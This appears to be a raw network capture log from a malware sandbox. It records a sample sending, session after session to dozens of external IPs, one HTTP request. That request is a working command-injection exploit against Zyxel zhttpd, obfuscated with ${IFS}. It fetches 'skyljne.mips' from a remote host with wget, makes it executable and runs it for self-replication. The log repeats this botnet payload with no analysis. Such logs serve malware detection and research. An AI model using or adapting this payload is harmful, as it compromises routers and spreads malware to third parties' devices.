                                        Jan 14, 2024 16:18:45.465512037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4352192.168.2.1348016141.212.126.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465547085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4353192.168.2.1345670157.29.205.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465576887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4354192.168.2.1353858192.70.233.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465643883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4355192.168.2.1336808207.72.229.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465692043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4356192.168.2.135628098.69.101.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465754032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4357192.168.2.1353370134.130.232.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465785980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4358192.168.2.1338422208.200.66.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465837955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4359192.168.2.1338878118.67.83.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465889931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4360192.168.2.135375059.131.160.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465933084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4361192.168.2.1348808126.220.234.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.465950012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4362192.168.2.135559819.246.47.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466006994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4363192.168.2.1342702166.126.108.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466047049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4364192.168.2.134992435.137.252.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466093063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4365192.168.2.1347302211.211.111.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466133118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4366192.168.2.135096239.200.38.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466186047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4367192.168.2.133767875.147.253.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466218948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4368192.168.2.1340240140.81.129.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466270924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4369192.168.2.135691814.72.204.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466324091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4370192.168.2.1340086141.76.40.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466366053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4371192.168.2.1356292141.131.109.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466407061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4372192.168.2.135023234.156.24.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466433048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4373192.168.2.134368425.156.10.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466500998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4374192.168.2.1358582174.103.93.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466519117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4375192.168.2.1354514135.67.86.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466556072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4376192.168.2.133435472.97.100.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466584921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4377192.168.2.1352038105.201.199.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466643095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4378192.168.2.134658232.8.167.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466700077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4379192.168.2.135689460.148.231.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466741085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4380192.168.2.1343548138.114.118.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466767073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4381192.168.2.1342002188.38.89.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466809034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4382192.168.2.136042873.98.142.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466836929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4383192.168.2.135783069.50.174.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466866016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4384192.168.2.135333623.24.69.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466866016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4385192.168.2.1342434191.211.248.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466903925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4386192.168.2.1340210212.90.133.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.466943979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4387192.168.2.134488279.236.251.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467015028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4388192.168.2.1348010123.191.187.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467057943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4389192.168.2.1345692179.222.69.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467080116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4390192.168.2.1340388189.113.209.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467135906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4391192.168.2.133486040.160.112.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467163086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4392192.168.2.133708299.46.167.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467187881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4393192.168.2.1333986130.165.57.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467262983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4394192.168.2.1336072174.30.78.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467289925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4395192.168.2.134122848.103.0.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467345953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4396192.168.2.134274291.106.0.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467387915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4397192.168.2.1341000151.201.126.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467431068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4398192.168.2.1335094173.45.16.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467482090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4399192.168.2.1338550190.216.219.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467524052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4400192.168.2.1347482132.121.233.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467554092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4401192.168.2.1348834217.51.23.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467591047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4402192.168.2.1352964109.13.214.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467638016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4403192.168.2.1354654115.188.93.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467663050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4404192.168.2.1357920149.60.174.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467705011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4405192.168.2.135513631.59.226.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467730999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4406192.168.2.135388858.218.128.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467797995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4407192.168.2.135707095.160.242.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467813015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4408192.168.2.1339396150.90.216.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467866898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4409192.168.2.135024035.133.85.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467905998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4410192.168.2.135052493.87.92.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467930079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4411192.168.2.1345502101.31.92.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.467953920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4412192.168.2.1351836206.127.155.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468009949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4413192.168.2.135884653.240.20.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.468063116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4414192.168.2.1353394204.165.217.207443
                                        TimestampBytes transferredDirectionData
